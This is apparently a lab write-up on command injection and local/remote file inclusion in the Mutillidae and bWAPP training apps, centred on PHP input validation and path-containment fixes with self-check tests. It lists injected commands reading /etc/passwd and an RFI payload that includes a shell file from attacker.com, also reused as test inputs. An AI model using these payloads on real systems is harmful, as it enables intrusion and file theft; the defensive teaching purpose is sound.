Command Injection RFI LFI Pentesting OWASP

Command Injection & RFI/LFI

Feb 1, 2022

Practice on exploiting and mitigating command injection and local/remote file inclusion (LFI/RFI) vulnerabilities using OWASP Mutillidae and bWAPP.

1. Command Injection

Access OWASP Mutillidae → OWASP 2013 → A1 Injection → DNS Lookup. The hostname field is concatenated into a shell command on the server, so appending a separator such as ; or | after the hostname makes the shell run a second command of the attacker's choosing, for example:

pwd
cat /etc/passwd
ls -la
ls /etc/apache2/

2. Countermeasures

<?php
// Allow-list validation: FILTER_VALIDATE_IP returns the value only if it is a
// syntactically valid IPv4/IPv6 address, so shell metacharacters never reach exec().
if ($targetIP = filter_input(INPUT_GET, 'ip', FILTER_VALIDATE_IP)) {
    // -c 4 bounds the ping (without it, Linux ping runs until killed);
    // escapeshellarg() is defence in depth should the validation ever be loosened.
    $cmd = exec("ping -c 4 " . escapeshellarg($targetIP));
} else {
    die("Please provide a valid IP address");
}
?>
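The DNS Lookup page from section 1 accepts hostnames, not only IP addresses, so the IP-only check above is not a drop-in fix for it. The following is an added example (not Mutillidae's own code) that places the vulnerable handler next to a hardened one whose validator accepts either an IP address or a hostname, and then checks that the section 1 payloads are rejected. The parameter name target_host, the use of nslookup, and the test inputs are assumptions made for the example.

```php
<?php
// Added example, not code from Mutillidae. The request parameter name
// 'target_host' and the nslookup command are assumptions.

// Vulnerable form: user input is concatenated straight into the command line,
// so "example.com; cat /etc/passwd" makes the shell run a second command.
function lookupVulnerable(string $host): string
{
    return (string) shell_exec("nslookup " . $host);
}

// Allow-list validation: return the input only if it is a valid IP address or
// a valid hostname (letters, digits, hyphens, dots), otherwise null.
function validateLookupTarget(string $input): ?string
{
    $input = trim($input);
    if (filter_var($input, FILTER_VALIDATE_IP) !== false) {
        return $input;
    }
    if (filter_var($input, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false) {
        return $input;
    }
    return null;
}

// Hardened form: validate first, then quote anyway as defence in depth.
function lookupHardened(string $input): string
{
    $target = validateLookupTarget($input);
    if ($target === null) {
        http_response_code(400);
        return "Invalid host name or IP address";
    }
    // escapeshellarg() single-quotes the value, so ; | & ` $ stay literal even
    // if the validator above is ever relaxed.
    return (string) shell_exec("nslookup " . escapeshellarg($target));
}

// Self-check with constructed inputs, including the section 1 payloads.
$cases = [
    "example.com"                  => true,
    "10.0.0.5"                     => true,
    "example.com; cat /etc/passwd" => false,
    "example.com | ls -la"         => false,
    "; pwd"                        => false,
];
foreach ($cases as $input => $shouldPass) {
    $accepted = validateLookupTarget($input) !== null;
    assert($accepted === $shouldPass);
    printf("%-30s %s\n", $input, $accepted ? "accepted" : "rejected");
}
```

In a real handler the request value would come from filter_input(INPUT_GET, 'target_host') and be passed to lookupHardened(); the loop at the bottom only exercises the validator so the example runs from the command line. Logging rejected inputs at this point also gives a cheap detection signal, since legitimate users rarely submit hostnames containing ; or |.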

3. LFI / RFI

?language=/etc/passwd
?language=/etc/hostname
?language=http://attacker.com/shell.txt&comando=id

4. Countermeasures

; php.ini
allow_url_include = Off
allow_url_fopen   = Off
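Turning off allow_url_include and allow_url_fopen stops remote inclusion, but the local payloads in section 3 (?language=/etc/passwd) still work unless the application itself refuses to build an include path from user input. As an added example (not bWAPP's or Mutillidae's code), the following resolves the language parameter against a fixed allow-list of language codes and then confirms the resulting real path stays inside the language directory. The language codes, the directory layout and the temporary directory created for the self-check are assumptions made for the example.

```php
<?php
// Added example, not application code. Assumes a page that includes one
// language file chosen by ?language=..., with the language codes below.

// Only these short codes are ever turned into a file name.
const ALLOWED_LANGUAGES = ['en', 'fr', 'de'];

// Return the real path of the language file to include, or null to reject.
function resolveLanguageFile(string $requested, string $langDir): ?string
{
    // 1. Allow-list: paths, URLs and traversal sequences are not in the list.
    if (!in_array($requested, ALLOWED_LANGUAGES, true)) {
        return null;
    }
    // 2. The application, not the user, builds the path: fixed dir + code + fixed extension.
    $candidate = $langDir . '/' . $requested . '.php';
    // 3. Belt and braces: the resolved path must exist and lie inside $langDir.
    $real = realpath($candidate);
    $base = realpath($langDir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Self-check against a constructed language directory holding only en.php.
$langDir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($langDir);
file_put_contents($langDir . '/en.php', "<?php \$greeting = 'Hello';\n");

$cases = [
    'en'                            => true,
    '/etc/passwd'                   => false,
    '../../etc/hostname'            => false,
    'http://attacker.com/shell.txt' => false,
    'fr'                            => false, // allow-listed code, but no such file shipped
];
foreach ($cases as $input => $shouldResolve) {
    $resolved = resolveLanguageFile($input, $langDir);
    assert(($resolved !== null) === $shouldResolve);
    printf("%-32s %s\n", $input, $resolved === null ? 'rejected' : "include $resolved");
}

unlink($langDir . '/en.php');
rmdir($langDir);
```

The page would then call include once on the non-null return value and send a 400 otherwise. The realpath check is deliberately redundant with the allow-list: it catches the case where someone later widens the list or switches the lookup to a user-supplied string, and it is the same containment check that makes an open_basedir-style restriction effective at the application layer.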